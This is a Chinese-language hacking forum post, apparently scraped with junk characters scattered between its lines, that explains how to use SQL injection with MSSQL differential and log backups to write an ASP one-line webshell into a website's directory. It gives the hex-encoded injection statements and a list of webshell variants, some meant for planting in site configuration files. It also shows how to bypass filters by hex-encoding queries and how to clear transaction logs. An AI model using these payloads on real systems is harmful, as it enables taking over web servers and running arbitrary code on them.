MSsql差异备份总结

admin

差异备份的流程大概这样：
/ X: H. F! B6 l7 C* |$ N& g/ C- t1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

1 X" I, r5 E/ X6 B2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
; c1 ]5 C$ i( z' b4 c3 K% ]insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
4 y+ W2 `  D9 q9 ^: t. u( F/ B
0 C0 w+ L2 C" b: q% E- `3.进行差异备份
7 u; C' `% ~/ H- Bbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
. P# P! v& l6 H! C0 I
, e( o5 r! d% P$ G8 ~! }! r% A上面
0x3C25657865637574652872657175657374282261222929253E
( j1 B9 D/ f: b5 |1 n. l/ m2 p就是一句话木马的内容：<%execute(request("a"))%>
  L" f! d; T" |) a& s. X  T
如下是网上常见的差异备份代码，思路一样！
6 \  V* R/ t% \' k1 I6 u" W$ B===================================================
( i4 ]' w; y0 h利用差异备份提高提高backupwebshell的成功率,减少文件大小
8 D9 S+ U8 @, Y步骤:
( z8 `! `: Z4 e. W. O% Q1 n
- o7 e' d4 Q( m& D. U2 Adeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
; v' Q7 z: G- J0 d. s* e% p* n
- |: ]9 L6 i) \7 bdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
) B1 K, i$ f; N
drop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
' i/ f& ^6 B. k4 f5 \: d3 u0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
! Z* M8 o0 C9 w. }, k
声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================

" l+ r1 R7 E& ?6 v' l我发现上面代码，有时会无效，而直接用
# [4 a0 S5 e! k6 P
backup database 库名 to disk = 'c:\ddd.bak'
6 K0 l8 W7 x% t+ c7 q* v5 K# l
) {! Q6 i7 W1 f' s6 {) kcreate table [dbo].[dtest] ([cmd] [image]);
( Y8 @( w' Z2 K+ ~  V4 k
& k1 L0 q! Q0 n: K5 n) M. A' ~# o; qinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

8 P5 R; c9 |% S; tbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

) l. U3 K) W' e* x: g却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
5 G, X" s, f7 z! Y0 Q2 B: R
  H- K" d8 v8 S/ {4 _* w库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
/ |, }0 R9 |; z
- B' r3 F! ]0 @7 ]" e网上还有log增量备份的，我也把他记录一下
=====================================================
另一种log增量备份技术:

( f4 n. \. Y5 H2 @';alter database null set RECOVERY FULL--

8 @" q4 C  m5 t- G/ o% G, r';create table cmd (a image)--
7 }5 n$ O% R7 d1 T; j
' N- v0 N8 v+ _6 J5 ]0 m';backup log null to disk = 'f:\cmd' with init--
& y. y& D3 p# @. ]
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

& @- `! X$ o/ D' L2 u7 @4 X';backup log null to disk = '备份路径'--
2 w( O8 x& o" A
';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--
+ Y1 ^, E; q- c" T, `0 J4 g& Y# L0 z
# @3 Y' q4 }# M3 ?# W0 p, L# ]PS:0x3C2565786563757465287265717565737428226122292
+ y6 T% H5 k. |2 q1 x- L5 D: {9253EDA 是一句话小马16进制转来的
* I. z2 V2 M. d2 U) n9 i/ n
说到一句话马，还可以有这么几种写法：
* q, x' R9 ]1 ], t% B. u* H
" d0 {$ z7 B: X) T4 ^a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
5 r( V& A( N* y2 B! Te)<%25Execute(request("a"))%25>
+ v( Z8 ]8 I3 X1 N& I1 r0 ?f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
+ H" |* R* W! ^  v' Ph)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
0 K( p1 v  ?& l6 S! p3 R: |I)<%eval request(0)%>
/ z( b! K2 p" ^* c1 z7 }. PJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
# Y8 s: F0 M, @* o
* Y8 }( S9 ?: y, j6 C' G=============================================

当遇到差备过滤了/时用这个语句代替
1 S3 O4 N6 r, L
* W- }5 Y$ s. n3 l" t/ H/ Cdeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
! {( U+ v0 @; N: t# ]+ f+ `7 R) z
! ]' g) p) H! R# l' D把要执行的语句转16进制然后用exec执行

  Q0 W6 [. ~, X. D
# k4 P5 u" C. M4 t" h减少备份文件大小方法如下:
* o7 ~9 O2 Y* Y9 K8 j
总的来说就是那么简单几句,下面以备份数据库model为例子
9 z; H9 B1 \" Y! C  M1
$ H$ e+ a$ X+ ?3 S! W" ^id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
  W( S. k3 s! f" X) D2 g5 s0 W9 Wid=1;backup database model to disk='你的路径‘ with differential,format;--

$ l3 q% w: z7 @; R& M  g% q7 n: \1 e

SQL语句清理日志
注：test为数据库名
6 S- U7 p2 z! P- z
( U4 s& f: Q# Z3 K" Z0 w--清空日志
& g% y: `$ ^& p* {) j1 xDUMP TRANSACTION test WITH NO_LOG

--截断事务日志
) u6 j. C  h1 O% E; j4 TBACKUP LOG test WITH NO_LOG

. Z$ |  Q2 }- o% ], \. J# C--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
; G5 v  K# J! a4 k/ U1 [! zSelect * from sysfiles DBCC SHRINKFILE(1)
$ t% V2 `* ^4 p& t  U
--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'